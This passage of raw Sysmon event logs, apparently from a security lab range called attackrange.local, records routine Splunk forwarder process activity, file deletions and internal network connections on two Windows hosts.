Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.337{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.337{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.338{0C1E0330-F624-60EB-A379-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:29.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE3A5CF4D7A708F821ED3142646E5FF2,SHA256=F24FDD60FA2426631FBACB5F298C7BE6020A7E3A7E53E2F00CDD540237488750,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:29.214{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45DA6CB54F17BC8FCC76C468B4804646,SHA256=BD18BF3A1A151C1643B91590592BB1ED7829508A5173B891714963E2DD3DFAFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:29.384{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=974AF5F28ABC0AE66C264185CAC22665,SHA256=CA263FD174C6DAC6DE77FD31C2B2774061AC718820CBC5CC7D52FFF1ED7FB03B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:30.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245CA8BF2665686FAACF9482EEBBAB4C,SHA256=4ABB33458CDE6F069BE024CA6903452A9E18B47F28B1028B6E620F37F9D194E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:30.229{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D213C543AD5D5F0545A48F45CD93B4EE,SHA256=AB6ABE0B5617B7B67BA729824CF756AB5B58E1F69D725D270283CD61BA9F97C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:30.150{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=95AEC4CBDFC7D303D19F43D4F1B6127C,SHA256=CD50429BA66470AFC9944D42F8D439E2122FA0642E95B5089D3339622A61DE95,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:28.282{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57345-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:31.665{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAC5A8918A0807EF9FF388E1E82AAD05,SHA256=4CB9FD3337747A2322D1429A7485F6269CFE99D8C88EC5B9D542F927EA445D7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:23.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51112-false10.0.1.12-8000- 23542300x80000000000000001051669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:31.245{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5EC50ECB265434B11121974E8BCC67,SHA256=07B1831017FE453D5778D17FEF5CDCD141B8014A908954B2E451C7BD27BFBFDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:32.665{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CA00119DFF5D0480947578AEA3E72E6,SHA256=E19BC5B7F9C0AC5EE01ECB7D310B64642C05CEC9BBDF86EF750C3D251DEEDC86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:32.259{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FF5E89EBD1C995EE35102255B7B8B6,SHA256=9AE9015FFA321CAA1B4FF8EE0A3ACFEDE2C9DA0A9F9E6F10AE21F6EB34D65596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:33.697{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33E8610C237B13965FCC79615C04BCC,SHA256=5F81FAD0885D396DF3F449F9A39DD1DE2CB1A0BDB404F7B7F5B08123D092DF17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:33.274{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3670CDBD16C5F50AA82E6D0CACE20866,SHA256=BE70B8EF3CE3B496CF2853E40FF91E636B7E1CF0AD7051087AA2FD542CD24C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:34.732{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD211AA73D739618EED9B44DECE08F4,SHA256=0DBAC0297683E188C386741E448434EA576503BF785B5646AAECCE79841B98D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:34.289{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE085E771AEF102EA611FDDCA9615621,SHA256=DADBF63B2B784E385167FBADC6C7DA778CADC2B8EB667A2F242200AC4BBADEB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:35.748{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F10BEE53374A09E5C28D2C121E11DAE1,SHA256=8BFFDAC2E894336CD3D969906348B93360C693632E09EEC13A00631F47E200F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:35.305{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0297AF850ABDB11224F05B879E44060,SHA256=98F40E4A186DAA3D6FD7B69F8CDBC421CDFDADCD138EAB2F886099F169AD69BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:33.345{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57346-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:36.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=124F1AB43D688E4843196183E7C23EA8,SHA256=95F91B9BE56EA468C9C5F6DB6B2AC2CDF8D9F59A5B9CA17C63767A3AA9F017D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:36.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5994F495B5724323B456508564949D93,SHA256=00FAA138D1AA5C03933A723954EC8A2AB9B6FC6400799497DC4FB6A87198F8D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:37.795{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A1E94CD57216F53CE206202D94348A6,SHA256=9C9E83C573000F498D696C0E14CB6EF6388714ABDC168A1E4D164AC9D6619C8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:29.723{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51113-false10.0.1.12-8000- 23542300x80000000000000001051676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:37.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C028FBCC853BBDAEC18DAF2C693E9E9E,SHA256=5EE27DF189129245EE5A6B35840E4087E4AFE72D63F0952EBB6BC5B7ADDE4F42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:38.811{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17AF21ECD524A2CD67B5244387125E24,SHA256=D96C90ACA80B1FE1242E65B0D2329642796FF537BB8176FB29A80C32D1196C58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:38.585{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 